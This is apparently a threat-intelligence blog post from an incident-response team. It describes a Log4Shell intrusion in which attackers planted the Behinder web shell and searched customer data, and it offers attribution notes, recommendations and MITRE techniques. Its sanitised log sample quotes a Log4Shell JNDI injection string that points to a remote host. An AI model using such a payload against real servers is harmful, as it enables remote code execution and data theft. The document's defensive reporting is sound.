A look Behinder the scene

Posted on by darklabhk

Popular web shell exploited after Log4Shell for data theft

DarkLab recently responded to an incident affecting a Hong Kong organisation in the retail sector. Threat actors exploited the vulnerability CVE-2021-44228 in the Apache Log4j library, also known as Log4Shell, as initial infection vector (link). While we observed multiple attempted exploitation of Log4Shell against our Managed Security Service clients since its initial reveal on 10 December 2021, this was the first instance where we observed Log4Shell exploited in a prolonged network intrusion whose aim was not the typical crypto-mining or ransomware deployment for financial gain.

After initial access via Log4Shell, the actor dropped the Behinder web shell on the victim’s public-facing web servers. They exploited this access sporadically over a period of 51 days to retrieve additional information from backend database servers, which led to an increase in network activity and their subsequent discovery.

Initial access and web shell deployment  

Log4Shell is a software vulnerability in the Apache Log4j 2, a popular Java library to extend logging capabilities in applications. The vulnerability enables a remote attacker to gain the ability to execute arbitrary code and take control of a device running vulnerable versions of Apache Log4j 2.

In this instance, we observed that the adversary performed manual probing to identify an entry point in the login page of a victim’s public-facing web server. The adversary spent several hours repeatedly interacting with the vulnerable webpage. Such prolonged interaction with the identified target suggest attackers were not just running automated scripts like we have seen many opportunistic threat actors do, but rather had a degree of interest in compromising this victim.

# Entry in Nginx
x.x.x.x – – [1/Jan/2022:08:00:00 +0000] “POST /login/logincheck HTTP/1.1” 302 0 “[https:]
//www.victim.com/victim/login” “Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36” “x.x.x.x”
# Corresponding entry in Apache Log4j log
INFO | jvm 1 | main | 2022/01/01 08:00:00.130 | org.app.victim.UnhandledException: Invalid id ‘${jndi:rmi://x.x.x.x:1099/oHg5SJ}’
INFO | jvm 1 | main | 2022/01/01 08:00:00.433 | org.app.victim.UnhandledException: Invalid id ‘${jndi:rmi://x.x.x.x:1099/oHg5SJ}’

Fig 1 – log sample showing threat actors’ exploitation attempt. The sample has been sanitised to maintain the victim’s anonymity.

Once successfully exploited Log4Shell, they dropped the Behinder web shell (or “冰蝎”). Behinder is a versatile, multi-platform web shell created by a Chinese-speaking developer and popular within the hacking community in the same country (link). This web shell allows for AES-encrypted command and control (C2) traffic (link), which helped the threat actor maintain stealth and persistence in their victim’s environment.

Fig 2 – example of Behinder web shell’s user interface, likely used by the attacker to interact with the victim’s environment

The threat actor then performed enumeration of the internal system with the web shell and obtained the application credentials to access the backend application database. In this database the threat actor issued search queries via the web shell. These used terms revealing their interest in customer data such as customers’ names, email addresses and residential addresses. At this point, limited log availability did not allow us to determine the amount and nature of data accessed and exfiltrated.

Intruders interacted with the compromised servers via throwaway infrastructure. They used Vultr Virtual Private Servers (VPS) hosted in South Korea for several consecutive days, followed by VPS hosted in Japan in the subsequent network spikes. Adversaries typically rent VPS from service providers such as Vultr to host their C2 servers while masking the origin of their source IP addresses, thereby preventing security researchers to easily trace and link their infrastructure with previously known intrusions.

Who is Behinder the intrusion?  

We do not have enough evidence to confidently attribute the intrusion to a known threat actor group. The large amount of customers’ personally identifiable information the victim held was of likely interest to financially and politically-motivated threat actors alike.

However, the use the Behinder web shell strongly suggests a Chinese-speaking threat actor. We also noticed how a recent open source paper (link) on the Earth Lusca group describes the actor as using Vultr VPS infrastructure and dropping Behinder, which match our observed activity. Notably, Earth Lusca has also previously targeted Hong Kong organisations. However, this allegedly state-sponsored group routinely exploits malware like Winnti and Cobalt Strike which we have not seen in this incident. This, and the relatively generic TTPs observed, hinders any confident attribution assessment.

Recommendations

  • Echoing our 2022 predictions advice, organisations should profile their attack surface to understand services open, technologies used, and known vulnerabilities. Patching programmes should enable a threat-based prioritisation of missing security patches and facilitate rapid deployment of critical security patches within aggressive timeframes.
  • Build a robust enterprise security architecture with layered defense to address potential security risks to critical assets (i.e., data, infrastructure, applications).
  • Enable security audit logs to ensure maximum visibility on existing security monitoring. In particular, ensure that logs’ retention period is sufficient to support after-the-fact investigations of potential incidents.
  • Implement specific mitigations against Log4Shell and related Log4j-related vulnerabilities including blocking specific outbound Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) network traffic

MITRE ATT&CK TTPs Leveraged

  • Reconnaissance: Active Scanning (T1595)
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Discovery: File and Directory Discovery (T1083)
  • Discovery: Network Service Scanning (T1046)
  • Collection: Data from Local System (T1005)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)
  • Command and Control: Encrypted Channel – Symmetric Cryptography (T1573.001)
  • Exfiltration: Exfiltration Over C2 Channel (T1041)

Indicators of Compromise (IOCs)

Feel free to contact us at [threatintel at darklab dot hk] for the full set of Indicators of Compromise (IOCs).

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

Leave a Reply